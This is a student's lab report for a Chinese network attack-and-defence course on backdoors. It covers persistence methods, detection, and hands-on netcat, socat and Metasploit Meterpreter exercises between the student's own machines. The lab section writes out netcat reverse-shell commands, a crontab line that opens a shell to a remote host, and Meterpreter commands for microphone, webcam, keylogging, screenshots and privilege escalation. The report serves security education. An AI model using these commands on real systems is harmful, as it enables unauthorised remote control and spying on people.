20222426 2024-2025-1 《网络与系统攻防技术》实验二实验报告
1.实验内容
(1)例举你能想到的一个后门进入到你系统中的可能方式?
后门进入系统中的一种可能方式是通过下载并安装带有后门程序的恶意软件。这些恶意软件可能伪装成合法的软件或工具,诱骗用户下载并安装。一旦安装,后门程序就会在系统中隐藏起来,等待被激活或用于非法访问系统。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
1.在Windows系统中,后门可能通过以下几种方式启动:
通过注册表启动:后门程序可能会修改Windows注册表中的某些项,以便在系统启动时自动运行。
通过计划任务启动:后门程序可能会创建一个计划任务,该任务会在特定时间或系统启动时运行。
通过服务启动:后门程序可能会将自己注册为一个Windows服务,以便在系统启动时自动运行。
2.在Linux系统中,后门可能通过以下几种方式启动:
通过crontab启动:后门程序可能会修改用户的crontab文件,以便在特定时间或系统启动时运行。
通过系统服务启动:后门程序可能会将自己注册为一个系统服务,以便在系统启动时自动运行。
通过脚本启动:后门程序可能会编写一个脚本,该脚本会在系统启动或用户登录时运行。
(3)Meterpreter有哪些给你映像深刻的功能?
1.远程控制:Meterpreter允许攻击者通过网络与远程受感染的计算机建立连接,并获取对该计算机的完全控制权限。
2.持久性:Meterpreter提供了一系列方法,可以在受感染系统上实现持久化,以确保攻击者在系统重启后仍然能够访问。
3.功能模块:Meterpreter提供了许多内置模块,用于执行各种操作,包括文件系统访问、网络探测、提权、远程shell访问等。
4.加密通信:Meterpreter使用加密的通信通道,确保攻击者和受感染系统之间的数据传输是安全的,并且可以绕过防火墙和入侵检测系统的监控。
5.跨平台支持:Meterpreter可以在多个操作系统上运行,包括Windows、Linux、Mac等。
(4)如何发现自己有系统有没有被安装后门?
1.检查系统用户和权限:通过系统的用户管理工具或命令行工具(如Windows的“net user”和“net localgroup administrators”命令),检查系统中是否存在未知的用户或具备超级管理员权限的用户。这些未知用户可能是后门程序创建的,用于隐藏后门或执行恶意操作。
2.检查网络连接状态:使用命令行工具(如Windows的“netstat -ano”命令)或网络监控工具(如TCPView),检查系统中是否存在可疑的网络连接。特别是那些指向未知IP地址或端口的连接,可能是后门程序在尝试与攻击者建立通信。
3.扫描系统漏洞和恶意软件:使用专业的安全扫描工具或杀毒软件,对系统进行全面的扫描和检测。这些工具可以帮助发现系统中的漏洞和恶意软件,包括后门程序。
4.检查系统日志和事件记录:通过查看系统的日志文件或事件记录,可以发现异常的系统活动或错误。这些活动或错误可能与后门程序的安装和运行有关。
(5)关于ncat、socat、Meterpreter
1.ncat
定义:ncat是nmap项目的一部分,是对netcat的一种改进,但它们不共享任何源代码,且ncat与netcat(包含不同分支的netcat)有着良好的兼容性。ncat支持TCP/UDP端口重定向、SOCKS4/HTTP代理、SSL等功能。
用途:ncat是一个通用的命令行工具,可用于通过网络读取、写入、重定向和加密数据。它可以充当TCP/UDP/SCTP/SSL客户端或服务器,加密与SSL的通信,并通过IPv4或IPv6传输。此外,它还可以执行系统命令,作为连接代理允许两个(或更多)客户端通过第三台(代理)服务器彼此连接。
基本用法:连接模式为“ncat
2.socat
定义:socat是一个功能强大的网络工具,可以在Linux系统上通过命令行使用。它的主要功能是在不同的数据流之间建立连接和转发数据。
用途:socat可以用于创建TCP和UDP连接、连接到串口、转发数据等。此外,它还支持加密通信和使用代理服务器等高级功能。
基本语法:socat [选项] <地址> <地址>。其中,地址可以是IP地址、端口号或者UNIX域套接字文件的路径。
3.Meterpreter
定义:Meterpreter是Metasploit框架中的一个工具,作为漏洞溢出后的攻击载荷使用。攻击载荷在触发漏洞后会返回一个由攻击者控制的通道,可用于远程执行命令。
特点:Meterpreter提供了各个主流平台的版本,包括Windows、Linux,同时支持x86、x64平台。它的工作模式是纯内存的,因此很难被杀毒软件监测到,也不会在目标主机磁盘上留下入侵痕迹。此外,Meterpreter还支持Ruby脚本形式的扩展。
常用命令:包括查看帮助(help)、返回并挂起Meterpreter(background)、查看正在运行的后台脚本(bglist)、运行后台脚本(bgrun)等。此外,还有针对安卓手机和Windows系统的特定命令,如获取手机通讯录、发送短信、获取GPS定位信息,以及查看进程、获取系统信息、关闭杀毒软件等。
2.实验过程
(1)使用netcat获取主机操作Shell,cron启动某项任务
在Windows系统里面以管理员身份打开cmd,输入ipconfig
查询ip地址为192.168.173.79
在kali里面以sudo su打开cmd,输入ifconfig
查询ip地址为192.168.190.128
Windows获取Linux Shell,
Windows系统里面使用ncat.exe -l -p 2426,等待其他机器连接该端口。
kali使用命令nc 192.168.173.79 2426 -e /bin/sh 反弹连接Windows。
Windows获得了linux的shell,可以执行linux的相关命令,例如ls,这里的乱码属于正常情况,因为两个系统的编码方式不一致。
Linux获取Windows Shell,
linux系统里面使用命令nc -l -p 2426,设置监听端口。
Windows系统里面使用ncat.exe -e cmd.exe 192.168.190.128 2426
linux获得Windows的shell,可以执行相关命令,例如ls,ipconfig,dir。
利用ncat可执行文件 传输数据。Linux监听4308端口,Windows连接Linux的4308端口
两台机器就可以互相传输信息,这里的乱码属于正常情况,因为两个系统的编码方式不一致。
(2)使用socat获取主机操作Shell, 任务计划启动
Windows获取Linux Shell用指令crontab -e编辑定时任务,在最后一行添加51* * * * /bin/netcat 172.30.7.176 4308 -e /bin/sh。
这里没有成功执行,发现时间前面不小心加了#,重新设置。
这里成功执行。
使用man socat查看socat使用说明。
在任务计划程序里面,新建任务计划。
成功运行。
在kali终端输入指令,此时Linux监听中。等待indows启动任务后,Linux成功获得Windows Shell。
(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
输入以上三个命令。
在Windows系统里面找到20222426weihongyu.exe。
在kali上使用 msfconsole 命令,进入msf控制台。
之后配置监听模块,使用show options展示信息。
输入exploit运行模块,之后在Windows上以管理员身份运行20222426weihongyu.exe。
发现kali获得了Windows主机的连接,输入dir,发现执行成功。
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
获取目标主机的音频使用record_mic。
获取摄像头所拍摄的照片使用webcam_snap。
使用keyscan_start开始记录键盘记录,然后在Windows上新建word文档,进行输入。之后,在kali里面输入keyscan_dump ,就可以显示键盘记录。
获取目标主机的截屏内容使用screenshot。
先使用getuid指令查看当前用户,再使用getsystem指令进行提权,因为之前以管理员身份运行了20222426weihongyu.exe,所以这里做实验很顺利。
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
生成以pwn20222426为模板的shellcode文件20222426why
配置监听模块
在kali上运行20222426why,注意权限提升:chmod 755 20222426why,这里得到了远程控制的shell,可以执行ls,ifconfig命令,实验成功。
3.问题及解决方案
- 问题1:kali的ip地址变化,在输入nc命令时显示timeout。
- 问题1解决方案:连接手机热点和局域网时的ip不同,第一次做实验时连接手机热点,之后连接局域网,恢复连接手机热点即可。
- 问题2:监听模块运行不成功。
- 问题2解决方案:20222426why文件权限不够,不能使用chmod +x 20222426why,使用chmod 755 20222426why,就成功运行了。
- 问题3:使用MSF生成shellcode失败。
- 问题3解决方案:在文件pwn20222426上打开终端,使用sudo su进入root用户,重新输入命令,生成20222426why成功。
4.学习感悟、思考等
要想实验顺利进行,得提前关闭Windows主机上的杀毒软件和防火墙,比如360杀毒软件会自动删除后门文件。最大的感受是,对于后门,应该定期更新系统和软件补丁、使用强密码、不轻易下载和安装未知软件等,以提高系统的安全性。